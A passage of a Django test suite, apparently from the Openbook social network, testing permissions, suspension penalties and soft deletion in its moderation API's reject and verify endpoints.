headers = make_authentication_headers_for_user(regular_user)
response = self.client.post(url, **headers)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertTrue(ModeratedObject.objects.filter(
object_id=user.pk,
status=ModeratedObject.STATUS_PENDING
).exists())
def test_can_reject_community_moderated_object_if_global_moderator(self):
"""
should be able to reject a community moderated object if global moderator
"""
global_moderator = make_global_moderator()
community = make_community()
reporter_community = make_user()
report_category = make_moderation_category()
reporter_community.report_community(community=community,
category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_community(community=community,
category_id=report_category.pk)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(global_moderator)
response = self.client.post(url, **headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertTrue(ModeratedObject.objects.filter(
object_id=community.pk,
status=ModeratedObject.STATUS_REJECTED
).exists())
def test_cant_reject_community_moderated_object_if_community_moderator(self):
"""
should not be able to reject a community moderated object if community moderator
"""
community_creator = make_user()
community = make_community(creator=community_creator)
community_moderator = make_user()
community_moderator.join_community_with_name(community_name=community.name)
community_creator.add_moderator_with_username_to_community_with_name(community_name=community.name,
username=community_moderator.username
)
community = make_community()
reporter_community = make_user()
report_category = make_moderation_category()
reporter_community.report_community(community=community,
category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_community(community=community,
category_id=report_category.pk)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(community_moderator)
response = self.client.post(url, **headers)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertTrue(ModeratedObject.objects.filter(
object_id=community.pk,
status=ModeratedObject.STATUS_PENDING
).exists())
def test_cant_reject_community_moderated_object_if_regular_community(self):
"""
should not be able to reject a community moderated object if regular community
"""
regular_community = make_user()
community = make_community()
reporter_community = make_user()
report_category = make_moderation_category()
reporter_community.report_community(community=community,
category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_community(community=community,
category_id=report_category.pk)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(regular_community)
response = self.client.post(url, **headers)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertTrue(ModeratedObject.objects.filter(
object_id=community.pk,
status=ModeratedObject.STATUS_PENDING
).exists())
def test_can_reject_community_post_moderated_object_if_global_moderator(self):
"""
should be able to reject a community_post moderated object if global moderator
"""
global_moderator = make_global_moderator()
community = make_community()
community_post_creator = make_user()
community_post_creator.join_community_with_name(community_name=community.name)
community_post = community_post_creator.create_community_post(community_name=community.name,
text=make_fake_post_text())
reporter_community_post = make_user()
report_category = make_moderation_category()
reporter_community_post.report_post(post=community_post,
category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_post(
post=community_post,
category_id=report_category.pk)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(global_moderator)
response = self.client.post(url, **headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertTrue(ModeratedObject.objects.filter(
object_id=community_post.pk,
status=ModeratedObject.STATUS_REJECTED
).exists())
def test_can_reject_community_post_moderated_object_if_community_post_moderator(self):
"""
should be able to reject a community_post moderated object if community_post moderator
"""
community_creator = make_user()
community = make_community(creator=community_creator)
community_moderator = make_user()
community_moderator.join_community_with_name(community_name=community.name)
community_creator.add_moderator_with_username_to_community_with_name(
community_name=community.name,
username=community_moderator.username
)
community_post_creator = make_user()
community_post_creator.join_community_with_name(community_name=community.name)
community_post = community_post_creator.create_community_post(community_name=community.name,
text=make_fake_post_text())
reporter_community_post = make_user()
report_category = make_moderation_category()
reporter_community_post.report_post(post=community_post,
category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_post(
post=community_post,
category_id=report_category.pk)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(community_moderator)
response = self.client.post(url, **headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertTrue(ModeratedObject.objects.filter(
object_id=community_post.pk,
status=ModeratedObject.STATUS_REJECTED
).exists())
def test_cant_reject_community_post_moderated_object_if_regular_community_post(self):
"""
should not be able to reject a community_post moderated object if regular community_post
"""
regular_user = make_user()
community = make_community()
community_post_creator = make_user()
community_post_creator.join_community_with_name(community_name=community.name)
community_post = community_post_creator.create_community_post(community_name=community.name,
text=make_fake_post_text())
reporter_community_post = make_user()
report_category = make_moderation_category()
reporter_community_post.report_post(post=community_post,
category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_post(
post=community_post,
category_id=report_category.pk)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(regular_user)
response = self.client.post(url, **headers)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertTrue(ModeratedObject.objects.filter(
object_id=community_post.pk,
status=ModeratedObject.STATUS_PENDING
).exists())
def test_can_reject_community_post_comment_moderated_object_if_global_moderator(self):
"""
should be able to reject a community_post_comment moderated object if global moderator
"""
global_moderator = make_global_moderator()
community = make_community()
community_post_comment_creator = make_user()
community_post_comment_creator.join_community_with_name(community_name=community.name)
community_post = community_post_comment_creator.create_community_post(
community_name=community.name,
text=make_fake_post_text())
community_post_comment = community_post_comment_creator.comment_post(
post=community_post,
text=make_fake_post_text())
reporter_community_post_comment = make_user()
report_category = make_moderation_category()
reporter_community_post_comment.report_comment_for_post(post=community_post,
post_comment=community_post_comment,
category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_post_comment(
post_comment=community_post_comment,
category_id=report_category.pk)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(global_moderator)
response = self.client.post(url, **headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertTrue(ModeratedObject.objects.filter(
object_id=community_post_comment.pk,
status=ModeratedObject.STATUS_REJECTED
).exists())
def test_can_reject_community_post_comment_moderated_object_if_community_post_comment_moderator(self):
"""
should be able to reject a community_post_comment moderated object if community_post_comment moderator
"""
community_creator = make_user()
community = make_community(creator=community_creator)
community_moderator = make_user()
community_moderator.join_community_with_name(community_name=community.name)
community_creator.add_moderator_with_username_to_community_with_name(
community_name=community.name,
username=community_moderator.username
)
community_post_comment_creator = make_user()
community_post_comment_creator.join_community_with_name(community_name=community.name)
community_post = community_post_comment_creator.create_community_post(
community_name=community.name,
text=make_fake_post_text())
community_post_comment = community_post_comment_creator.comment_post(
post=community_post,
text=make_fake_post_text())
reporter_community_post_comment = make_user()
report_category = make_moderation_category()
reporter_community_post_comment.report_comment_for_post(post=community_post,
post_comment=community_post_comment,
category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_post_comment(
post_comment=community_post_comment,
category_id=report_category.pk)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(community_moderator)
response = self.client.post(url, **headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertTrue(ModeratedObject.objects.filter(
object_id=community_post_comment.pk,
status=ModeratedObject.STATUS_REJECTED
).exists())
def test_cant_reject_community_post_comment_moderated_object_if_regular_community_post_comment(self):
"""
should not be able to reject a community_post_comment moderated object if regular community_post_comment
"""
regular_user = make_user()
community = make_community()
community_post_comment_creator = make_user()
community_post_comment_creator.join_community_with_name(community_name=community.name)
community_post = community_post_comment_creator.create_community_post(
community_name=community.name,
text=make_fake_post_text())
community_post_comment = community_post_comment_creator.comment_post(
post=community_post,
text=make_fake_post_text())
reporter_community_post_comment = make_user()
report_category = make_moderation_category()
reporter_community_post_comment.report_comment_for_post(post=community_post,
post_comment=community_post_comment,
category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_post_comment(
post_comment=community_post_comment,
category_id=report_category.pk)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(regular_user)
response = self.client.post(url, **headers)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertTrue(ModeratedObject.objects.filter(
object_id=community_post_comment.pk,
status=ModeratedObject.STATUS_PENDING
).exists())
def test_creates_rejected_changed_log_on_update(self):
"""
should create an rejected changed log on update
"""
global_moderator = make_global_moderator()
user = make_user()
reporter_user = make_user()
report_category = make_moderation_category()
reporter_user.report_user_with_username(username=user.username, category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_user(user=user,
category_id=report_category.pk)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(global_moderator)
response = self.client.post(url, **headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(1, ModeratedObjectStatusChangedLog.objects.filter(
changed_from=ModeratedObject.STATUS_PENDING,
changed_to=ModeratedObject.STATUS_REJECTED,
log__actor_id=global_moderator.pk,
log__moderated_object__object_id=user.pk
).count())
def _get_url(self, moderated_object):
return reverse('reject-moderated-object', kwargs={
'moderated_object_id': moderated_object.pk
})
class VerifyModeratedObjectApiTests(OpenbookAPITestCase):
"""
VerifyModeratedObjectApi
"""
def test_verifying_approved_low_severity_moderated_object_places_exponential_minutes_suspension_penalty(
self):
"""
verifying an approved low severity moderated object should place an exponential minutes suspension penalty
"""
global_moderator = make_global_moderator()
reporter_user = make_user()
number_of_reported_items = 4
user = make_user()
for i in range(0, number_of_reported_items):
post = user.create_public_post(text=make_fake_post_text())
report_category = make_moderation_category(severity=ModerationCategory.SEVERITY_LOW)
reporter_user.report_post(post=post, category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_post(post=post,
category_id=report_category.pk)
global_moderator.approve_moderated_object(moderated_object=moderated_object)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(global_moderator)
response = self.client.post(url, **headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
penalties_count = user.count_moderation_penalties_for_moderation_severity(
moderation_severity=ModerationCategory.SEVERITY_LOW)
expected_expiration_date = (timezone.now() + timezone.timedelta(minutes=penalties_count ** 2))
moderation_penalty = ModerationPenalty.objects.get(
moderated_object_id=moderated_object.pk,
user_id=user.pk, )
moderation_penalty_expiration = moderation_penalty.expiration
self.assertEqual(expected_expiration_date.date(), moderation_penalty_expiration.date())
self.assertEqual(expected_expiration_date.hour, moderation_penalty_expiration.hour)
self.assertEqual(expected_expiration_date.minute, moderation_penalty_expiration.minute)
def test_verifying_approved_medium_severity_moderated_object_places_exponential_hours_suspension_penalty(
self):
"""
verifying an approved medium severity moderated object should place an exponential hours suspension penalty
"""
global_moderator = make_global_moderator()
reporter_user = make_user()
number_of_reported_items = 4
user = make_user()
for i in range(0, number_of_reported_items):
post = user.create_public_post(text=make_fake_post_text())
report_category = make_moderation_category(severity=ModerationCategory.SEVERITY_MEDIUM)
reporter_user.report_post(post=post, category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_post(post=post,
category_id=report_category.pk)
global_moderator.approve_moderated_object(moderated_object=moderated_object)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(global_moderator)
response = self.client.post(url, **headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
penalties_count = user.count_moderation_penalties_for_moderation_severity(
moderation_severity=ModerationCategory.SEVERITY_MEDIUM)
expected_expiration_date = timezone.now() + timezone.timedelta(hours=penalties_count ** 3)
moderation_penalty = ModerationPenalty.objects.get(
moderated_object_id=moderated_object.pk,
user_id=user.pk, )
moderation_penalty_expiration = moderation_penalty.expiration
self.assertEqual(expected_expiration_date.date(), moderation_penalty_expiration.date())
self.assertEqual(expected_expiration_date.hour, moderation_penalty_expiration.hour)
self.assertEqual(expected_expiration_date.minute, moderation_penalty_expiration.minute)
def test_verifying_approved_high_severity_moderated_object_places_exponential_days_suspension_penalty(
self):
"""
verifying an approved high severity moderated object should place an exponential days suspension penalty
"""
global_moderator = make_global_moderator()
reporter_user = make_user()
number_of_reported_items = 4
user = make_user()
for i in range(0, number_of_reported_items):
post = user.create_public_post(text=make_fake_post_text())
report_category = make_moderation_category(severity=ModerationCategory.SEVERITY_HIGH)
reporter_user.report_post(post=post, category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_post(post=post,
category_id=report_category.pk)
global_moderator.approve_moderated_object(moderated_object=moderated_object)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(global_moderator)
response = self.client.post(url, **headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
penalties_count = user.count_moderation_penalties_for_moderation_severity(
moderation_severity=ModerationCategory.SEVERITY_HIGH)
expected_expiration_date = (timezone.now() + timezone.timedelta(days=penalties_count ** 4)).date()
moderation_penalty = ModerationPenalty.objects.get(
moderated_object_id=moderated_object.pk,
user_id=user.pk, )
moderation_penalty_expiration_date = moderation_penalty.expiration.date()
self.assertEqual(expected_expiration_date, moderation_penalty_expiration_date)
def test_verifying_approved_critical_severity_moderated_object_places_5000_weeks_suspension_penalty(self):
"""
verifying an approved critical severity moderated object should place a 5000 weeks suspension penalty
"""
global_moderator = make_global_moderator()
reporter_user = make_user()
user = make_user()
report_category = make_moderation_category(severity=ModerationCategory.SEVERITY_CRITICAL)
reporter_user.report_user(user=user, category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_user(user=user,
category_id=report_category.pk)
global_moderator.approve_moderated_object(moderated_object=moderated_object)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(global_moderator)
response = self.client.post(url, **headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
expected_expiration_date = (timezone.now() + timezone.timedelta(weeks=5000)).date()
moderation_penalty = ModerationPenalty.objects.get(
user_id=user.pk, )
moderation_penalty_expiration_date = moderation_penalty.expiration.date()
self.assertEqual(expected_expiration_date, moderation_penalty_expiration_date)
def test_verifying_approved_any_severity_post_comment_moderated_object_soft_deletes_it(self):
"""
verifying an approved any severity post_comment moderated object should soft delete it
"""
global_moderator = make_global_moderator()
reporter_user = make_user()
moderation_category_severities = self._get_moderation_category_severities()
for moderation_category_severity in moderation_category_severities:
post_comment_creator = make_user()
post = post_comment_creator.create_public_post(text=make_fake_post_text())
post_comment = post_comment_creator.comment_post(post=post, text=make_fake_post_comment_text())
report_category = make_moderation_category(severity=moderation_category_severity)
reporter_user.report_comment_for_post(post_comment=post_comment, post=post, category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_post_comment(
post_comment=post_comment,
category_id=report_category.pk)
global_moderator.approve_moderated_object(moderated_object=moderated_object)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(global_moderator)
response = self.client.post(url, **headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertTrue(PostComment.objects.filter(
pk=post_comment.pk,
is_deleted=True,
).exists())
def test_verifying_approved_any_severity_community_moderated_object_soft_deletes_it(self):
"""
verifying an approved any severity community moderated object should soft delete it
"""
global_moderator = make_global_moderator()
reporter_user = make_user()
moderation_category_severities = self._get_moderation_category_severities()
for moderation_category_severity in moderation_category_severities:
community_creator = make_user()
community = make_community(creator=community_creator)
report_category = make_moderation_category(severity=moderation_category_severity)
reporter_user.report_community(community=community, category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_community(community=community,
category_id=report_category.pk)
global_moderator.approve_moderated_object(moderated_object=moderated_object)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(global_moderator)
response = self.client.post(url, **headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertTrue(Community.objects.filter(
pk=community.pk,
is_deleted=True,
).exists())
def test_verifying_approved_any_severity_post_moderated_object_soft_deletes_it(self):
"""
verifying an approved any severity post moderated object should soft delete it
"""
global_moderator = make_global_moderator()
reporter_user = make_user()
moderation_category_severities = self._get_moderation_category_severities()
for moderation_category_severity in moderation_category_severities:
post_creator = make_user()
post = post_creator.create_public_post(text=make_fake_post_text())
report_category = make_moderation_category(severity=moderation_category_severity)
reporter_user.report_post(post=post, category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_post(post=post,
category_id=report_category.pk)
global_moderator.approve_moderated_object(moderated_object=moderated_object)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(global_moderator)
response = self.client.post(url, **headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertTrue(Post.objects.filter(
pk=post.pk,
is_deleted=True,
).exists())
def test_verifying_approved_critical_severity_user_moderated_object_soft_deletes_its_comments_and_communities(self):
"""
verifying an approved critical severity user moderated object should soft delete its posts and communities
"""
global_moderator = make_global_moderator()
reporter_user = make_user()
user = make_user()
post = user.create_public_post(text=make_fake_post_text())
post_commenter = make_user()
post_comment = post_commenter.comment_post(post=post, text=make_fake_post_comment_text())
community = make_community(creator=user)
report_category = make_moderation_category(severity=ModerationCategory.SEVERITY_CRITICAL)
reporter_user.report_user(user=user, category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_user(user=user,
category_id=report_category.pk)
global_moderator.approve_moderated_object(moderated_object=moderated_object)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(global_moderator)
response = self.client.post(url, **headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
post.refresh_from_db()
community.refresh_from_db()
post_comment.refresh_from_db()
self.assertTrue(post.is_deleted)
self.assertTrue(community.is_deleted)
self.assertTrue(post_comment.is_deleted)
def test_verifying_rejected_critical_severity_user_moderated_object_does_not_soft_deletes_its_comments_and_communities(
self):
"""
verifying a rejected critical severity user moderated object does not soft delete its posts and communities
"""
global_moderator = make_global_moderator()
reporter_user = make_user()
user = make_user()
post = user.create_public_post(text=make_fake_post_text())
post_commenter = make_user()
post_comment = post_commenter.comment_post(post=post, text=make_fake_post_comment_text())
community = make_community(creator=user)
report_category = make_moderation_category(severity=ModerationCategory.SEVERITY_CRITICAL)
reporter_user.report_user(user=user, category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_user(user=user,
category_id=report_category.pk)
global_moderator.reject_moderated_object(moderated_object=moderated_object)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(global_moderator)
response = self.client.post(url, **headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
post.refresh_from_db()
community.refresh_from_db()
post_comment.refresh_from_db()
self.assertFalse(post.is_deleted)
self.assertFalse(community.is_deleted)
self.assertFalse(post_comment.is_deleted)
def test_verifying_approved_any_severity_post_moderated_object_soft_deletes_its_comments(self):
"""
verifying an approved any severity post moderated object should soft delete its comments
"""
global_moderator = make_global_moderator()
reporter_user = make_user()
post_creator = make_user()
post = post_creator.create_public_post(text=make_fake_post_text())
amount_of_post_comments = 5
post_comment_ids = []
for i in range(0, amount_of_post_comments):
post_commenter = make_user()
post_comment = post_commenter.comment_post(post=post, text=make_fake_post_comment_text())
post_comment_ids.append(post_comment.pk)
report_category = make_moderation_category(severity=ModerationCategory.SEVERITY_MEDIUM)
reporter_user.report_post(post=post, category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_post(post=post,
category_id=report_category.pk)
global_moderator.approve_moderated_object(moderated_object=moderated_object)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(global_moderator)
response = self.client.post(url, **headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertTrue(len(post_comment_ids), PostComment.objects.filter(
post_id=post.pk,
is_deleted=True,
).count())
def test_verifying_approved_any_severity_community_moderated_object_soft_deletes_its_posts(self):
"""
verifying an approved any severity community moderated object should soft delete its posts
"""
global_moderator = make_global_moderator()
reporter_user = make_user()
community = make_community()
amount_of_posts = 5
post_ids = []
for i in range(0, amount_of_posts):
post_creator = make_user()
post_creator.join_community_with_name(community_name=community.name)
post_comment = post_creator.create_community_post(community_name=community.name,
text=make_fake_post_text())
post_ids.append(post_comment.pk)
report_category = make_moderation_category(severity=ModerationCategory.SEVERITY_MEDIUM)
reporter_user.report_community(community=community, category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_community(community=community,
category_id=report_category.pk)
global_moderator.approve_moderated_object(moderated_object=moderated_object)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(global_moderator)
response = self.client.post(url, **headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertTrue(len(post_ids), Post.objects.filter(
community_id=community.pk,
is_deleted=True,
).count())
def test_verifying_approved_critical_severity_user_moderated_object_soft_deletes_it(self):
"""
verifying an approved critical severity user moderated object should soft delete it
"""
global_moderator = make_global_moderator()
reporter_user = make_user()
user = make_user()
report_category = make_moderation_category(severity=ModerationCategory.SEVERITY_CRITICAL)
reporter_user.report_user(user=user, category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_user(user=user,
category_id=report_category.pk)
global_moderator.approve_moderated_object(moderated_object=moderated_object)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(global_moderator)
response = self.client.post(url, **headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertTrue(User.objects.filter(
pk=user.pk,
is_deleted=True,
).exists())
def test_verifying_approved_not_critical_severity_user_moderated_object_does_not_soft_delete_it(self):
"""
verifying an approved non critical severity user moderated object should not soft delete it
"""
global_moderator = make_global_moderator()
reporter_user = make_user()
user = make_user()
report_category = make_moderation_category(severity=ModerationCategory.SEVERITY_HIGH)
reporter_user.report_user(user=user, category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_user(user=user,
category_id=report_category.pk)
global_moderator.approve_moderated_object(moderated_object=moderated_object)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(global_moderator)
response = self.client.post(url, **headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertTrue(User.objects.filter(
pk=user.pk,
is_deleted=False,
).exists())
def test_verifying_rejected_user_moderated_object_does_not_place_suspension_penalty_on_user(self):
"""
verifying a rejected user moderated object should not place a suspension penalty on the user
"""
global_moderator = make_global_moderator()
reporter_user = make_user()
user = make_user()
report_category = make_moderation_category()
reporter_user.report_user(user=user, category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_user(user=user,
category_id=report_category.pk)
global_moderator.reject_moderated_object(moderated_object=moderated_object)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(global_moderator)
response = self.client.post(url, **headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertFalse(ModerationPenalty.objects.filter(
moderated_object_id=moderated_object.pk,
user_id=user.pk,
expiration__isnull=False
).exists())
def test_verifying_approved_user_moderated_object_places_suspension_penalty_on_user(self):
"""
verifying an approved user moderated object should place a suspension penalty on the user
"""
global_moderator = make_global_moderator()
reporter_user = make_user()
user = make_user()
report_category = make_moderation_category()
reporter_user.report_user(user=user, category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_user(user=user,
category_id=report_category.pk)
global_moderator.approve_moderated_object(moderated_object=moderated_object)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(global_moderator)
response = self.client.post(url, **headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertTrue(ModerationPenalty.objects.filter(
moderated_object_id=moderated_object.pk,
user_id=user.pk,
expiration__isnull=False
).exists())
def test_verifying_approved_post_moderated_object_places_suspension_penalty_on_creator(self):
"""
verifying an approved post moderated object should place a suspension penalty on the creator
"""
global_moderator = make_global_moderator()
reporter_user = make_user()
post_creator = make_user()
post = post_creator.create_public_post(text=make_fake_post_text())
report_category = make_moderation_category()
reporter_user.report_post(post=post, category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_post(post=post,
category_id=report_category.pk)
global_moderator.approve_moderated_object(moderated_object=moderated_object)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(global_moderator)
response = self.client.post(url, **headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertTrue(ModerationPenalty.objects.filter(
moderated_object_id=moderated_object.pk,
user_id=post_creator.pk,
expiration__isnull=False
).exists())
def test_verifying_approved_community_moderated_object_places_suspension_penalty_on_staff(self):
"""
verifying an approved community moderated object should place a suspension penalty on the staff
"""
global_moderator = make_global_moderator()
reporter_user = make_user()
community_creator = make_user()
community = make_community(creator=community_creator)
community_moderator = make_user()
community_moderator.join_community_with_name(community_name=community.name)
community_creator.add_moderator_with_username_to_community_with_name(username=community_moderator.username,
community_name=community.name)
community_administrator = make_user()
community_administrator.join_community_with_name(community_name=community.name)
community_creator.add_administrator_with_username_to_community_with_name(
username=community_administrator.username,
community_name=community.name)
report_category = make_moderation_category()
reporter_user.report_community(community=community, category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_community(community=community,
category_id=report_category.pk)
global_moderator.approve_moderated_object(moderated_object=moderated_object)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(global_moderator)
response = self.client.post(url, **headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(3, ModerationPenalty.objects.filter(
moderated_object_id=moderated_object.pk,
user_id__in=[community_creator.pk, community_moderator.pk, community_administrator.pk],
expiration__isnull=False
).count())
def test_verifying_approved_post_comment_moderated_object_places_suspension_penalty_on_creator(self):
"""
verifying an approved post comment moderated object should place a suspension penalty on the creator
"""
global_moderator = make_global_moderator()
reporter_user = make_user()
post_comment_creator = make_user()
post = post_comment_creator.create_public_post(text=make_fake_post_text())
post_comment = post_comment_creator.comment_post(post=post, text=make_fake_post_comment_text())
report_category = make_moderation_category()
reporter_user.report_comment_for_post(post_comment=post_comment, post=post, category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_post_comment(post_comment=post_comment,
category_id=report_category.pk)
global_moderator.approve_moderated_object(moderated_object=moderated_object)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(global_moderator)
response = self.client.post(url, **headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertTrue(ModerationPenalty.objects.filter(
moderated_object_id=moderated_object.pk,
user_id=post_comment_creator.pk,
expiration__isnull=False
).exists())
def test_can_verify_moderated_object_if_global_moderator_and_approved(self):
"""
should be able to verify a user moderated object if global moderator and approved
"""
global_moderator = make_global_moderator()
user = make_user()
reporter_user = make_user()
report_category = make_moderation_category()
reporter_user.report_user_with_username(username=user.username, category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_user(user=user,
category_id=report_category.pk)
global_moderator.approve_moderated_object(moderated_object=moderated_object)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(global_moderator)
response = self.client.post(url, **headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertTrue(ModeratedObject.objects.filter(
object_id=user.pk,
verified=True
).exists())
def test_can_verify_moderated_object_if_global_moderator_and_rejected(self):
"""
should be able to verify a user moderated object if global moderator and rejected
"""
global_moderator = make_global_moderator()
user = make_user()
reporter_user = make_user()
report_category = make_moderation_category()
reporter_user.report_user_with_username(username=user.username, category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_user(user=user,
category_id=report_category.pk)
global_moderator.reject_moderated_object(moderated_object=moderated_object)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(global_moderator)
response = self.client.post(url, **headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertTrue(ModeratedObject.objects.filter(
object_id=user.pk,
verified=True
).exists())
def test_cant_verify_moderated_object_if_global_moderator_and_pending(self):
"""
should not be able to verify a user moderated object if global moderator and pending
"""
global_moderator = make_global_moderator()
user = make_user()
reporter_user = make_user()
report_category = make_moderation_category()
reporter_user.report_user_with_username(username=user.username, category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_user(user=user,
category_id=report_category.pk)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(global_moderator)
response = self.client.post(url, **headers)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertTrue(ModeratedObject.objects.filter(
object_id=user.pk,
status=ModeratedObject.STATUS_PENDING,
verified=False
).exists())
def test_cant_verify_user_moderated_object_if_community_moderator(self):
"""
should not be able to verify a user moderated object if community moderator
"""
global_moderator = make_global_moderator()
community_creator = make_user()
community = make_community(creator=community_creator)
community_moderator = make_user()
community_moderator.join_community_with_name(community_name=community.name)
community_creator.add_moderator_with_username_to_community_with_name(community_name=community.name,
username=community_moderator.username
)
user = make_user()
reporter_user = make_user()
report_category = make_moderation_category()
reporter_user.report_user_with_username(username=user.username, category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_user(user=user,
category_id=report_category.pk)
global_moderator.approve_moderated_object(moderated_object=moderated_object)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(community_moderator)
response = self.client.post(url, **headers)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
self.assertTrue(ModeratedObject.objects.filter(
object_id=user.pk,
verified=False
).exists())
def test_cant_verify_user_moderated_object_if_regular_user(self):
"""
should not be able to verify a user moderated object if regular user
"""
regular_user = make_user()
global_moderator = make_global_moderator()
user = make_user()
reporter_user = make_user()
report_category = make_moderation_category()
reporter_user.report_user_with_username(username=user.username, category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_user(user=user,
category_id=report_category.pk)
global_moderator.approve_moderated_object(moderated_object=moderated_object)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(regular_user)
response = self.client.post(url, **headers)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
self.assertTrue(ModeratedObject.objects.filter(
object_id=user.pk,
